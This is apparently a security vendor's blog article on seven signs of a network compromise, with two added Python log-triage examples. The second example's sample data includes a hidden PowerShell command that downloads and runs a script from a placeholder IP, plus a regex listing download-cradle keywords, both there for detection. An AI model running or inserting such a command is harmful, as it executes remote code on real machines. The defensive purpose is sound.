Seven (7) signs that your network has been hacked

There are telltale signs that let you know you’ve been hacked. During any cyberattack, whether it's classic intrusions, data exfiltration, or ransomware, hackers leave their tracks in your network. And if you actively monitor your network security, you should be able to identify the signs quickly and minimize the impact of the cyberattack.

If you don't monitor your network security, the hacker will have plenty of time to snoop around and identify the most promising systems to target before taking action. According to an IBM report on security breaches, in 2021 organizations took an average of 212 days to discover they’d been hacked! That’s a 212-day head start for the bad guys.

Here are 7 clear signs that your network has been hacked. Keep a close eye on them and react quickly if you identify them.



  1. Your servers suddenly slow down for no reason

Sudden and unexplained slowness of your servers is often a sign that you’ve been hacked for cryptocurrency mining. Three (3) scenarios are very often exploited to hack your servers for cryptocurrency mining:

  • A malicious file is introduced into your network via a phishing attack
  • The hacker finds a vulnerability on your server and exploits it to take control, then runs a malicious cryptocurrency mining tool
  • The hacker exploits a vulnerability that allows them to drop and execute the malicious tool directly on your server without taking full control of it

What to do: when you experience unexplained slowness on your servers, search the security events (logs) generated by the affected servers. Look for PowerShell script executions that connect to remote websites to download other files. If you find any, you have confirmation of a hack. Also, consider that cryptocurrency mining is often only one step in an attack: the hacker's ultimate goal may be to introduce ransomware into your network. If you find this, it’s time to trigger your incident response plan.



  2. You find suspicious files on your servers or workstations

It won’t come as a surprise that it's never a good sign to find suspicious files on your servers or workstations. In most cases, it is a sign that you have been hacked and that the hacker is in your network.

What to do: never ignore suspicious or unknown files! Disconnect all machines on which suspicious files have been found. Then analyze these files to determine whether they are malicious or not. Online tools such as VirusTotal, Tri.age, or Any.run allow you to check if a file is malicious. The rule here is to never try to tinker. If you don't have the in-house expertise, get outside help. Specialized incident response companies such as StreamScan can help you analyze the files to get to the bottom of it. If needed, they will also help you manage the incident from start to finish, to limit the impact.


  3. Your antivirus or EDR detects and blocks multiple suspicious/malicious files in a short period of time

No matter how effective your antivirus or EDR is, the fact that it detects and blocks multiple malicious files in your network in a short period of time (e.g. 1 week or 1 month) is unusual and never reassuring. Whenever you have a spike in the detection of malicious tools in your network, you must act and above all not let your guard down. Chances are that a hacker is already in your network and trying to introduce malicious tools. Some of these tools will be blocked by your antivirus/EDR software, but others will not. It only takes one malicious tool to go undetected by your antivirus/EDR to set things in motion.

What to do: if you observe this kind of unusual event, analyze the files blocked by the antivirus/EDR. Are they port scanning or vulnerability scanning tools? Are they remote control tools? Are they password cracking tools? We also strongly recommend that you analyze the security logs on all machines where suspicious files have been detected and blocked to see if there has been any suspicious access.

  4. You discover a suspicious user account created in your network

The discovery of a suspicious user account or one that does not respect your nomenclature of user names is very often an indication that your network has been compromised. If it turns out that this dubious account has administrator privileges, it’s urgent to act because the hacker is most certainly in your network.

What to do: keep a cool head and check to confirm if the account was created by someone on your team. If not, trigger your incident response process. If you don't have the internal expertise to handle the incident, seek external help. And do it fast. Every second of malicious access multiplies your risk.


Don't delete the suspicious account you've detected: the hacker will realize that you've spotted it and will speed up the attack, which will cause more damage. Note that hackers like to have several strings to their bow. Usually, they are not satisfied with having only one access into your network, so just because you’ve found one access point and closed it doesn’t mean you’ve gotten rid of your hacker.
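One way to turn this sign into a routine check, as an added example that is not part of the original article: review Windows Security events for account creations (event 4720) and flag those whose name breaks your naming convention or that were added to an admin group (events 4728/4732) shortly after creation. The naming rule, the one-hour window and the event records are all constructed assumptions; field names are simplified from the real event XML.

```python
import re
from datetime import datetime, timedelta

# Assumed naming convention for this example: lowercase letters only, e.g. "jsmith" (adapt to yours)
NAMING_RULE = re.compile(r"^[a-z]{2,20}$")
ADMIN_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}

# Constructed Security events (not real logs): (event_id, timestamp, simplified fields)
# 4720 = user account created, 4728/4732 = member added to a global/local security group
SAMPLE_EVENTS = [
    (4720, "2023-03-02T02:31:10", {"TargetUserName": "jsmith", "SubjectUserName": "itadmin"}),
    (4720, "2023-03-02T02:33:42", {"TargetUserName": "sqlsvc$1", "SubjectUserName": "svc-backup"}),
    (4728, "2023-03-02T02:35:05", {"MemberName": "sqlsvc$1", "TargetUserName": "Domain Admins",
                                   "SubjectUserName": "svc-backup"}),
    (4720, "2023-03-01T10:05:00", {"TargetUserName": "mdupont", "SubjectUserName": "itadmin"}),
    (4732, "2023-03-01T16:00:00", {"MemberName": "mdupont", "TargetUserName": "Administrators",
                                   "SubjectUserName": "itadmin"}),
]


def review_new_accounts(events, window=timedelta(hours=1)):
    """Return one dict per created account with the reasons it looks suspicious (empty = nothing flagged)."""
    created = [(datetime.fromisoformat(ts), f) for eid, ts, f in events if eid == 4720]
    grants = [(datetime.fromisoformat(ts), f) for eid, ts, f in events if eid in (4728, 4732)]
    report = []
    for when, f in created:
        name = f["TargetUserName"]
        reasons = []
        if not NAMING_RULE.match(name):
            reasons.append("name outside naming convention")
        for g_when, g in grants:
            delay = g_when - when
            if g["MemberName"] == name and g["TargetUserName"] in ADMIN_GROUPS and timedelta(0) <= delay <= window:
                reasons.append(f"added to {g['TargetUserName']} {int(delay.total_seconds() // 60)} min after creation")
        report.append({"account": name, "created_by": f["SubjectUserName"],
                       "created": when.isoformat(), "reasons": reasons})
    return report


def suspicious_accounts(events):
    """Only the accounts that need a human to confirm whether someone on the team created them."""
    return [r for r in review_new_accounts(events) if r["reasons"]]


if __name__ == "__main__":
    for r in suspicious_accounts(SAMPLE_EVENTS):
        print(r["account"], "created by", r["created_by"], "->", "; ".join(r["reasons"]))
```

Accounts that pass the naming rule and receive admin rights outside the window (like mdupont) are still listed by review_new_accounts, so you can audit them separately.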

  5. You discover a remote access control tool installed without your knowledge

Hackers like to keep control over the machines they hack because it lets them plan and execute their malicious actions at their own pace. For this, one of their first reflexes is to install a remote control or remote administration tool on their victims' machines. The discovery of such a tool installed without authorization in your IT environment is a red flag. You must act quickly.

What to do: take the time to confirm whether the tool was installed by a member of your IT staff (if it’s a server) or by the user (if it’s a workstation). If the installation wasn’t done by an internal person, trigger your incident response plan.

  6. You discover a network scanner installed in your network without your knowledge

Once a hacker controls a machine in your network, their next step is to find interesting targets to infect. They will look first for servers that control sensitive systems (domain controllers, databases, etc.). To do this, they will use a network scanning tool that allows them to identify the machines in your network as well as the services they host. With this information, the hacker will be able to identify the important machines and focus on them.

What to do: if you find an unauthorized network scanner installed in your IT environment, immediately trigger your incident response plan.

  7. You find traces of known attacks in the logs of a server

When a security vulnerability is highly publicized, exploit code for it quickly becomes available on the Internet. Anyone can download it, adapt it and launch attacks. Hackers take advantage of this to set up automated attack servers that scan the Internet 24/7 to find and exploit the vulnerability. In the end, a very large number of machines are hacked in record time. This was the case for the PrintNightmare, ProxyShell, and Log4Shell vulnerabilities. Following this kind of media coverage, it is strongly recommended that organizations perform a vulnerability scan to identify whether they have vulnerable systems or not. If this exercise confirms that your servers are vulnerable, investigate further. If you find evidence that attempts to exploit the vulnerability have targeted a given server or servers, do not assume that they have been hacked without confirming it.



What to do: don’t take any risks; immediately disconnect the affected servers and carry out further analysis. Has suspicious code been executed on your servers, for example PowerShell scripts? Was your antivirus software stopped at any time? Were any logs deleted after the vulnerability was publicized? Were there any late-night connections to the server? If you have confirmation that a hack has occurred, trigger your incident response plan. If you don't have in-house expertise, seek external help. Above all, don't ignore the event.
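The triage questions above (and the PowerShell download check from sign 1) can be run mechanically over exported Windows event records. This added example is not part of the original article: it flags PowerShell download cradles (Security 4688), a cleared audit log (Security 1102), the Defender service being stopped (System 7036) and off-hours remote logons (Security 4624) occurring after the vulnerability's publication date. The event records, the publication date, the off-hours window and the simplified field names are constructed assumptions; 198.51.100.23 is from a documentation address range.

```python
import re
from datetime import datetime

# Constructed event records (not real logs): (log, event_id, timestamp, simplified fields)
SAMPLE_EVENTS = [
    ("Security", 4624, "2023-03-02T02:10:11", {"TargetUserName": "svc-backup", "LogonType": "10", "IpAddress": "198.51.100.23"}),
    ("System", 7036, "2023-03-02T02:12:30", {"param1": "Windows Defender Antivirus Service", "param2": "stopped"}),
    ("Security", 4688, "2023-03-02T02:14:05", {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/x.ps1')"}),
    ("Security", 1102, "2023-03-02T02:20:41", {"SubjectUserName": "svc-backup"}),
    ("Security", 4688, "2023-03-02T09:00:00", {"NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"}),
    ("Security", 4624, "2023-03-02T14:30:00", {"TargetUserName": "alice", "LogonType": "2", "IpAddress": "-"}),
    ("Security", 1102, "2023-02-20T11:00:00", {"SubjectUserName": "itadmin"}),  # before publication: ignored
]

# PowerShell fragments typical of scripts that fetch a second stage from a remote site
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|FromBase64String", re.I)
OFF_HOURS = range(0, 6)            # assumption: 00:00-05:59 local time is "late night" for this organization
PUBLISHED = datetime(2023, 3, 1)   # assumption: date the vulnerability was publicized


def triage(events, published=PUBLISHED):
    """Return (kind, timestamp, detail) findings sorted by time, for events on or after `published`."""
    findings = []
    for log, eid, ts, f in events:
        when = datetime.fromisoformat(ts)
        if when < published:
            continue
        if log == "Security" and eid == 4688 and "powershell" in f.get("NewProcessName", "").lower():
            if DOWNLOAD_CRADLE.search(f.get("CommandLine", "")):
                findings.append(("powershell_download", ts, f["CommandLine"]))
        elif log == "Security" and eid == 1102:
            findings.append(("audit_log_cleared", ts, f.get("SubjectUserName", "?")))
        elif log == "System" and eid == 7036 and "defender" in f.get("param1", "").lower() and f.get("param2") == "stopped":
            findings.append(("antivirus_stopped", ts, f["param1"]))
        elif log == "Security" and eid == 4624 and f.get("LogonType") in {"3", "10"} and when.hour in OFF_HOURS:
            findings.append(("off_hours_remote_logon", ts, f"{f['TargetUserName']} from {f['IpAddress']}"))
    return sorted(findings, key=lambda x: x[1])


if __name__ == "__main__":
    for kind, ts, detail in triage(SAMPLE_EVENTS):
        print(ts, kind, detail)
```

Any single finding is worth a look; several of them clustered within minutes, as in the sample, is the pattern that should trigger the incident response plan.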



Need help? StreamScan is here.

If you also need help defining your security incident response plan, managing a cybersecurity incident, or implementing a Managed Detection and Response (MDR) solution, contact us at securitepme@streamscan.ai or call us at 1-877-208-9040.

If you are looking for technology to protect your network, our CDS cyber threat detection technology is the best option for you. It is capable of detecting attacks upstream, at every stage (network scanning and vulnerability identification, attempted injection of attack exploits, brute force and similar attacks, lateral movement, persistence, etc.), blocking them and alerting you.
